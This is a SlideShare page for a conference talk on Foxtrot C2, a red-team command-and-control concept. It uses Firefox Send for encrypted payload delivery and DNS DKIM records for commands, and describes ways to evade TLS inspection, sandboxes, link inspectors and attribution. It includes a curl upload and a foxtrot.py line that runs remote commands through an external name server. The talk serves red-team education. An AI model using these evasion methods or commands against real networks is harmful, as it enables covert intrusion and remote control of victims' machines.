SlideShare une entreprise Scribd logo

Foxtrot C2: A Journey of Payload Delivery

Dimitry Snezhkov
Dimitry Snezhkov

Execution of an offensive payload may begin with a safe delivery of the payload to the endpoint itself. When secure connections in the enterprise are inspected, reliance only on transmission level security may not be enough to accomplish that goal. Foxtrot C2 serves one goal: safe last mile delivery of payloads and commands between the external network and the internal point of presence, traversing intercepting proxies, with the end-to-end application level encryption. While the idea of end-to-end application encryption is certainly not new, the exact mechanism of Foxtrot's delivery implementation has advantages to Red Teams as it relies on a well known third party site, enjoying elevated ranking and above average domain fronting features. Payload delivery involves several OpSec defenses: sensible protection from direct attribution, active link expiration to evade consistent interception, inspection, tracking and replay activities by the defenders. Asymmetric communication channels are also planned. And if your standalone Foxtrot agent is caught, the delivery mechanism may live on, you could still manually bring the agent back into the environment via the browser. A concept tool built on these ideas will be presented and released. It will be used as basis for our discussion.

Technologie
1  sur  32
Télécharger pour lire hors ligne
Foxtrot C2. A Journey of Payload Delivery Safe(r) In-flight Payload Delivery Dimitry Snezhkov DerbyCon 8.0
Officially: Sr. Managing Consultant, X-Force Red, IBM Corporation Boils down to work with: • Netz • Appz • Toolz • Codez • Humanz About
Silence on the wire 30 minutes into sending a known good payload in a phish: Realization: Payload did not make it to the end user ... was it the link checker? ... was it the new / uncategorized domain access policy? ... was the payload package format caught by in-flight content inspection tools? ... did the user lack supported programs to deal with unwrapping the application payload? Note: The silence may be broken by a friendly sandbox visit under the name ”BOBS-PC”, joined by 12 more peers fetching and analyzing the payload over and over again. It’s a party, but not the one you want to be a part of! Now, can damage be contained/minimized? Can I avoid or delay attribution? Have You Ever …. ?
• Reasonably acquiesced networks scream anomalies. • TLS Unwrap is a given • Behavioral patterns, load, type, frequency, etc. • If we allow defense to build a “story” of activities the vector is burned. Strike One: Traffic Correlation
• Interception and immediate analysis of self contained payloads. Rinse and repeat • Correlation rules on payload spread across enterprise • Submission to cloud, analysis engines. No reuse. Strike Two: Payload Sampling
• Link inspection • Domain ranking • Attribution and possibly defensive retaliation • Etc. etc. So…. Let’s minimize their effects, and avoid a few of them too. Strike Three: A La Carte Offensive Pain Menu
• Properly configured layered in-flight defenses can be very effective for the Defense. • They can also be annoying to the Offense • may not be reliably replicated in test/lab or known • may lead to offensive teams giving up too early in the game. • (Not fighting OS defensive mechanisms here) Our Focus – In flight Defense
An alternative offensive content delivery mechanism is needed. Primary goals: 1. Capability to deliver content across hostile traffic inspection mediums. E.g. TLS traffic inspection assumed. 2. Capability to reach externally hosted content from the inside in the face of a strict content proxy and a heavy domain ranking. 3. Capability to decrease repeatable sampling of externally hosted attacker content by defensive mechanisms by controlling content access parameters, including one-time links, storage expiration, access limits. 4. + Capability to minimize attribution at the initial visit/download/delivery stage. 5. + Capability to pass by link inspectors (e.g. UrlDefense) 6. + High degree of utilization needed. Secondary goals: Lao Tzu says: we shall discuss them later ;) Offensive Payload Delivery Mechanism Improvements
Operation: Firefox Send Private, Encrypted File Sharing 1. Sender Uploads File 2. Firefox Stores Encrypted w/Shared Key Basic Access rules. 3. Recipient Downloads File
Platform: Firefox Send Private, Encrypted File Sharing https://www.w3.org/TR/WebCryptoAPI WebCrypto API* with AES-GCM algorithm to encrypt and decrypt the file in the browser The file that's transferred to Mozilla's server is already encrypted and its contents can't be viewed by Mozilla • The link includes the encryption key • Anyone with the link to download and access the file. • 1 GB file size limit • 1-24 times download limit *Web crypto API
• Send server can be deployed as a standalone server ( https://github.com/mozilla/send ) • Or hosted at https://send.firefox.com/ (our use case) Request (upload file and encrypt) POST /api/upload HTTP/1.1 Host: send.firefox.com X-File-Metadata: {"id":"55c97f947fc479547f16f125","filename":"monastery1.jpg"} Response: Additional Owner/ID Info: {"url":"https://send.firefox.com/download/3f9805bcd7/", "owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"} Encrypted Link Format: https://send.firefox.com/download/3f9805bcd7/#M3DA7NgkqlswuM9GFT4BCA Platform: Firefox Send Private, Encrypted File Sharing
Goal 1: Capability to deliver content across hostile traffic inspection (E.g. TLS traffic inspection) • Decryption of content in the browser by JS Encrypted last mile delivery https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg • Proxy can inspect TLS, will see an encrypted blob. • Unless the mechanism is known will rarely attempt to automatically detect and unwrap application encryption. • One-time shared key between the browser of the uploader and the browser of file recipient. • We don’t have to generate, FF Send takes care of that. Solving key distribution Evaluating Firefox Send Private Sharing Against Our Goals
Goal 2: Capability to reach hosted content in the face of a content proxy and heavy domain ranking https://send.firefox.com/ Mostly ranked high and “safe” Evaluating Firefox Send Private Sharing Against Our Goals
Goal 3: Capability to decrease repeatable sampling of content by defense by controlling content access parameters, including expiration, access limits. Advantages: • Link download throttling: 1-20 times Sandbox gets nothing on the 2nd attempt • Generous size of files (up to 1 GB) • Link expiration by time (24 hours) • File forced/manual deletion. • Additional encryption passwords. Further logic can be built. We will see more when we discuss secondary goals. Evaluating Firefox Send Private Sharing Against Our Goals
Goal 4: Capability to minimize attribution. • Storage OpSec: Ephemeral storage promise • No account to create. Owner is ephemeral File One: {"url":https://send.firefox.com/download/3f9805bcd7/ ,"owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"} File Two: {"url":https://send.firefox.com/download/1839672b2a/ ,"owner":"77b8a3559416aa14d668","id":"1839672b2a "} Who is owner 77b8a3559416aa14d668 ?? (anonymous uploads.) Evaluating Firefox Send Private Sharing Against Our Goals
Goal 5: Capability to minimize response from link inspectors https://send.firefox.com/download/1839672b2a/#os171fpGxYOLOykVYREN8w looks better than https://rogue.me/download/file Goal 6: Ability to progressively build delivery with off the shelf tools. Utilization / availability in all environments. The problem of shared keys fully custom application encryption: format support. Can you guarantee a client is able to unwrap? All you really need is a Firefox/Chrome/Safari browser with JS Crypto WebAPI. Edge (later/never?) Evaluating Firefox Send Private Sharing Against Our Goals
Weaponizing A Happy File Sharing Service
One time. Two times. Automate. 1. Building a delivery framework of agents based on the existing capabilities. 2. Solving task synchronization with split data and command channels. 3. Building command execution capability and hooks into the external C&C Secondary Goals: Automation
Goal 1: Building delivery agents based on the existing capabilities. • FFSend is Browser to Browser, via WebAPI Crypto JS. Can we replicate / automate? curl 'https://send.firefox.com/api/upload’ -H 'Authorization: send-v1 4m6CIIsv28NhHzFwI4coO7NQ4ptuH2dkQ2m0Fmft2B0j1ZcE18aeUWfIa3iuVyTQURKHZ4OboKxZmcCJCFmKJQ’ -H 'Origin: https://send.firefox.com’ -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ6VYFlqCoVpBLf6Y’ -H 'X-File- Metadata: J8OulomBWho3RdLoeHBkOh23c5glLkfNLPHMZcV6Yctny1ydtkDsol1D_cJ8mQ-G2o_ c8wu6_avkca8o5-E4itPpOuzE2AD2hfGTA-TYjw’ --data-binary $'------ WebKitFormBoundaryQ6VYFlqCoVpBLf6YrnContent-Disposition: form-data; name="data"; filename="blob"rnContent-Type: application/octet-streamrnrnrn------ WebKitFormBoundaryQ6VYFlqCoVpBLf6Y--rn’ --compressed {"url":"https://send.firefox.com/download/58d18f7c65/","delete":"0120a59343513ec237a4","id":"58d18f7c65"} Secondary Goals: Automation
Goal 1: Building delivery agents based on the existing capabilities (Cont.) JS Crypto WebAPI = Crypto Standards + HTTP libraries Py Crypto WebAPI = Crypto Standards + HTTP libraries Secondary Goals: Automation
Agent Delivery Notification Problem: How do you make the other party know the shared key / URL? https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg Notification side channels. The usual candidates HTTP, ICMP, DNS, etc. • HTTPS: Possible but: § Another highly ranked domain needed. Partially defeats the purpose. § Assume inspection of TLS, so another custom protocol to protect. • ICMP: Fairly limited structure- and capacity- wise, well inspected. • DNS: Inspected but we can probably blend in. Goal 1: Building delivery agents based on the existing capabilities (Cont.) Secondary Goals: Automation
Goal 2: Solving synchronization with split data and command channels. DNS: • Data channel to FFSend. • Command channel to DNS. Wanted features: • Avoid detection with well behaved packets across reasonably infrequent traffic. No splitting of 1GB file and sending it across many DNS TXT records. • Dynamic DNS updates from the agents, access control with Transaction Signatures • Commands over well formed TXT DKIM records. • Additional record content encryption with FFSend shared key. Secondary Goals: Automation
Communication Protocol Contract And how do we introduce communication directives? Develop and application protocol. DNS Record PAYLOAD { 't':'q’, 's':'J','c' :'o’, 'u': 'http://send.firefox.com/iuhui433/#903fkhf9884r3rhh3}
Communication Protocol Contract Hhow do we introduce communication directives? Develop and application DSL protocol. 3. Decrypted DKIM Record Instruction (request metadata, location of payload) { 't':'q’, 's':'J','c' :'o’, 'u': 'http://send.firefox.com/iuhui433/#903fkhf9884r3rhh3’} 1. DNS TXT Record for an agent: 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream @138.68.224.147 2. DNS TXT Record Content (Encrypted with agent key): v=DKIM1; h=sha256; k=rsa; t=y; s=email; p=nCohnr6A1i0I7SOAMCs7tKfYxaTeWrT3aek
Normal Communication Protocol Contract
• Might as well shuttle data AND commands. • Master/Slave concept by role • Peer-to-Peer concept by capability. • Store and poll model between the parties via FFSend service. Goal 3: Building command execution from the external C&C Secondary Goals: Automation
Foxtrot C2 DATA channel: Firefox Send Service COMMAND channel: PowerDNS (choice) • Flexibility: Backend (SQL, Bind, Pipe, etc.) HTTP API possible (Future fallback, round robin) • Agents can change roles (Master/Slave) • Agents can communicate P2P (WIP) • Command line and TUI menu driven • Agents can be hosted on FF Send. • Jitter/Intervals to blend in traffic (WIP) • Internal agent commands (WIP) • Download or push files • Download or push instructions for OSexec() • Planned LTKM Python for now
Foxtrot Operation ./foxtrot.py --agent agent_195694e2 --tsigname test2 --tsigrdata ./config/tsig-test2.dat --nserver 138.68.234.147 --domain s3bucket.stream --role master --verbose info send --operation ocmd --ocmd 'ps -ef | grep bash' Slave Master 1. Master (Post Job to Slave) 2. Slave (Receipt of Request): • Checks DNS record for its instructions • Fetches linked data file from FFSend • Processes (command or saves data) as instructed • Posts results back to FFSend • Updates DNS 3. Master (Get Response): • Checks DNS record for updates from Slave • Fetches linked data file from FFSend • Processes command output as instructed • Updates DNS record for Slave Agent
Interactive Console. Master/Slave Batch. Send commands, data from command line Foxtrot C2: Modes of Operation
Wire and Defense • Sample number of DNS TXT requests/responses, DKIM pointers • Vendors and Standalone implementations: • render CAPTCHAS for uploads • throttle number of uploads from the endpoint • Expect split protocol delivery across multiple channels
• Payload Delivery itself is neither easy not hard, it’s a challenge with variables. • Despite popular belief great defensive setups exist that eat offense for lunch. • Know thyself. Challenge: Instrumented, understood business processes, acquiesced networks. Un-?Common State of Affairs Parting Thoughts
Q&A Temporary location (will move, follow Twitter @Op_nomad): https://github.com/gh0std4ncer1/foxtrot Thanks!

Recommandé

Deep Sea Phishing Gear
Deep Sea Phishing GearDeep Sea Phishing Gear
Deep Sea Phishing GearDimitry Snezhkov
 
21 Www Web Services
21 Www Web Services21 Www Web Services
21 Www Web Servicesroyans
 
Grey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache PoisoningGrey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache PoisoningChristopher Grayson
 
Cloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataCloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataChristopher Grayson
 
ZN27112015
ZN27112015ZN27112015
ZN27112015Denis Kolegov
 
ION Tokyo: The Business Case for DNSSEC and DANE, Dan York
ION Tokyo: The Business Case for DNSSEC and DANE, Dan YorkION Tokyo: The Business Case for DNSSEC and DANE, Dan York
ION Tokyo: The Business Case for DNSSEC and DANE, Dan YorkDeploy360 Programme (Internet Society)
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Denis Kolegov
 

Recommandé

Deep Sea Phishing Gear
Deep Sea Phishing GearDeep Sea Phishing Gear
Deep Sea Phishing GearDimitry Snezhkov
 
21 Www Web Services
21 Www Web Services21 Www Web Services
21 Www Web Servicesroyans
 
Grey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache PoisoningGrey H@t - DNS Cache Poisoning
Grey H@t - DNS Cache PoisoningChristopher Grayson
 
Cloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataCloudstone - Sharpening Your Weapons Through Big Data
Cloudstone - Sharpening Your Weapons Through Big DataChristopher Grayson
 
ZN27112015
ZN27112015ZN27112015
ZN27112015Denis Kolegov
 
ION Tokyo: The Business Case for DNSSEC and DANE, Dan York
ION Tokyo: The Business Case for DNSSEC and DANE, Dan YorkION Tokyo: The Business Case for DNSSEC and DANE, Dan York
ION Tokyo: The Business Case for DNSSEC and DANE, Dan YorkDeploy360 Programme (Internet Society)
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...
Covert Timing Channels based on HTTP Cache Headers (Special Edition for Top 1...Denis Kolegov
 
Introducing HTTP/2
Introducing HTTP/2Introducing HTTP/2
Introducing HTTP/2Ido Flatow
 
Introduction to HTTP protocol
Introduction to HTTP protocolIntroduction to HTTP protocol
Introduction to HTTP protocolAviran Mordo
 
What HTTP/2.0 Will Do For You
What HTTP/2.0 Will Do For YouWhat HTTP/2.0 Will Do For You
What HTTP/2.0 Will Do For YouMark Nottingham
 
HTTP/2 What's inside and Why
HTTP/2 What's inside and WhyHTTP/2 What's inside and Why
HTTP/2 What's inside and WhyAdrian Cole
 
Understanding the Web through HTTP
Understanding the Web through HTTPUnderstanding the Web through HTTP
Understanding the Web through HTTPOlivia Brundage
 
HTTP/2 for Developers
HTTP/2 for DevelopersHTTP/2 for Developers
HTTP/2 for DevelopersSvetlin Nakov
 
Debugging with Fiddler
Debugging with FiddlerDebugging with Fiddler
Debugging with FiddlerIdo Flatow
 
DDoS Attacks and Countermeasures
DDoS Attacks and CountermeasuresDDoS Attacks and Countermeasures
DDoS Attacks and Countermeasuresthaidn
 
Rutgers - Communicator Pro M Media
Rutgers - Communicator Pro M MediaRutgers - Communicator Pro M Media
Rutgers - Communicator Pro M MediaMichael Dobe, Ph.D.
 
HTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesHTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesBrent Shaffer
 
Http2
Http2Http2
Http2Daniel Stenberg
 
What's New in HTTP/2
What's New in HTTP/2What's New in HTTP/2
What's New in HTTP/2NGINX, Inc.
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
HTTP/2: What no one is telling you
HTTP/2: What no one is telling youHTTP/2: What no one is telling you
HTTP/2: What no one is telling youFastly
 
Side-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and DefensesSide-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and DefensesTom Van Goethem
 
Http2 right now
Http2 right nowHttp2 right now
Http2 right nowDaniel Stenberg
 
Http/2 - What's it all about?
Http/2 - What's it all about?Http/2 - What's it all about?
Http/2 - What's it all about?Andy Davies
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
HTTP/2 Introduction
HTTP/2 IntroductionHTTP/2 Introduction
HTTP/2 IntroductionWalter Liu
 
Foxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryFoxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryDimitry Snezhkov
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudSalman Baset
 

Contenu connexe

Tendances

Introducing HTTP/2
Introducing HTTP/2Introducing HTTP/2
Introducing HTTP/2Ido Flatow
 
Introduction to HTTP protocol
Introduction to HTTP protocolIntroduction to HTTP protocol
Introduction to HTTP protocolAviran Mordo
 
What HTTP/2.0 Will Do For You
What HTTP/2.0 Will Do For YouWhat HTTP/2.0 Will Do For You
What HTTP/2.0 Will Do For YouMark Nottingham
 
HTTP/2 What's inside and Why
HTTP/2 What's inside and WhyHTTP/2 What's inside and Why
HTTP/2 What's inside and WhyAdrian Cole
 
Understanding the Web through HTTP
Understanding the Web through HTTPUnderstanding the Web through HTTP
Understanding the Web through HTTPOlivia Brundage
 
HTTP/2 for Developers
HTTP/2 for DevelopersHTTP/2 for Developers
HTTP/2 for DevelopersSvetlin Nakov
 
Debugging with Fiddler
Debugging with FiddlerDebugging with Fiddler
Debugging with FiddlerIdo Flatow
 
DDoS Attacks and Countermeasures
DDoS Attacks and CountermeasuresDDoS Attacks and Countermeasures
DDoS Attacks and Countermeasuresthaidn
 
Rutgers - Communicator Pro M Media
Rutgers - Communicator Pro M MediaRutgers - Communicator Pro M Media
Rutgers - Communicator Pro M MediaMichael Dobe, Ph.D.
 
HTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesHTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesBrent Shaffer
 
What's New in HTTP/2
What's New in HTTP/2What's New in HTTP/2
What's New in HTTP/2NGINX, Inc.
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
HTTP/2: What no one is telling you
HTTP/2: What no one is telling youHTTP/2: What no one is telling you
HTTP/2: What no one is telling youFastly
 
Side-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and DefensesSide-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and DefensesTom Van Goethem
 
Http/2 - What's it all about?
Http/2 - What's it all about?Http/2 - What's it all about?
Http/2 - What's it all about?Andy Davies
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
HTTP/2 Introduction
HTTP/2 IntroductionHTTP/2 Introduction
HTTP/2 IntroductionWalter Liu
 

Tendances (20)

Introducing HTTP/2
Introducing HTTP/2Introducing HTTP/2
Introducing HTTP/2
 
Introduction to HTTP protocol
Introduction to HTTP protocolIntroduction to HTTP protocol
Introduction to HTTP protocol
 
What HTTP/2.0 Will Do For You
What HTTP/2.0 Will Do For YouWhat HTTP/2.0 Will Do For You
What HTTP/2.0 Will Do For You
 
HTTP/2 What's inside and Why
HTTP/2 What's inside and WhyHTTP/2 What's inside and Why
HTTP/2 What's inside and Why
 
Understanding the Web through HTTP
Understanding the Web through HTTPUnderstanding the Web through HTTP
Understanding the Web through HTTP
 
HTTP/2 for Developers
HTTP/2 for DevelopersHTTP/2 for Developers
HTTP/2 for Developers
 
Debugging with Fiddler
Debugging with FiddlerDebugging with Fiddler
Debugging with Fiddler
 
DDoS Attacks and Countermeasures
DDoS Attacks and CountermeasuresDDoS Attacks and Countermeasures
DDoS Attacks and Countermeasures
 
Rutgers - Communicator Pro M Media
Rutgers - Communicator Pro M MediaRutgers - Communicator Pro M Media
Rutgers - Communicator Pro M Media
 
HTTP - The Protocol of Our Lives
HTTP - The Protocol of Our LivesHTTP - The Protocol of Our Lives
HTTP - The Protocol of Our Lives
 
Http2
Http2Http2
Http2
 
What's New in HTTP/2
What's New in HTTP/2What's New in HTTP/2
What's New in HTTP/2
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache Headers
 
HTTP/2: What no one is telling you
HTTP/2: What no one is telling youHTTP/2: What no one is telling you
HTTP/2: What no one is telling you
 
Side-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and DefensesSide-Channels on the Web: Attacks and Defenses
Side-Channels on the Web: Attacks and Defenses
 
Http2 right now
Http2 right nowHttp2 right now
Http2 right now
 
Http/2 - What's it all about?
Http/2 - What's it all about?Http/2 - What's it all about?
Http/2 - What's it all about?
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2
 
HTTP/2 Introduction
HTTP/2 IntroductionHTTP/2 Introduction
HTTP/2 Introduction
 

Similaire à Foxtrot C2: A Journey of Payload Delivery

Foxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryFoxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryDimitry Snezhkov
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudSalman Baset
 
Tokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker SecurityTokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker SecurityPhil Estes
 
DevOPS training - Day 1/2
DevOPS training - Day 1/2DevOPS training - Day 1/2
DevOPS training - Day 1/2Vincent Mercier
 
Wrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus TimochencoWrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus TimochencoLonginus Timochenco
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat Security Conference
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointZack Meyers
 
Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5Alec Muffett
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …Jinglun Li
 
Pros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptx
Pros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptxPros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptx
Pros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptxanbesa1
 
How to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael TremanteHow to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael TremanteWP Engine
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
 
Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok Docker, Inc.
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...YaJUG
 

Similaire à Foxtrot C2: A Journey of Payload Delivery (20)

Foxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload DeliveryFoxtrot C2: Forced Payload Delivery
Foxtrot C2: Forced Payload Delivery
 
Unraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production CloudUnraveling Docker Security: Lessons From a Production Cloud
Unraveling Docker Security: Lessons From a Production Cloud
 
Tokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker SecurityTokyo OpenStack Summit 2015: Unraveling Docker Security
Tokyo OpenStack Summit 2015: Unraveling Docker Security
 
DevOPS training - Day 1/2
DevOPS training - Day 1/2DevOPS training - Day 1/2
DevOPS training - Day 1/2
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Wrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus TimochencoWrath of Ransomware_Longinus Timochenco
Wrath of Ransomware_Longinus Timochenco
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
 
Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5Setting Up .Onion Addresses for your Enterprise, v3.5
Setting Up .Onion Addresses for your Enterprise, v3.5
 
Type URL, Enter, and Then …
Type URL, Enter, and Then …Type URL, Enter, and Then …
Type URL, Enter, and Then …
 
Pros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptx
Pros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptxPros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptx
Pros and Cons of Filezilla FTP in case of Secured Enterprise file Transfer.pptx
 
Burp suite
Burp suiteBurp suite
Burp suite
 
How to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael TremanteHow to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael Tremante
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
 
Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok Securing the Container Pipeline at Salesforce by Cem Gurkok
Securing the Container Pipeline at Salesforce by Cem Gurkok
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
 

Dernier

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
A Domino Admins Adventures (Engage 2024)
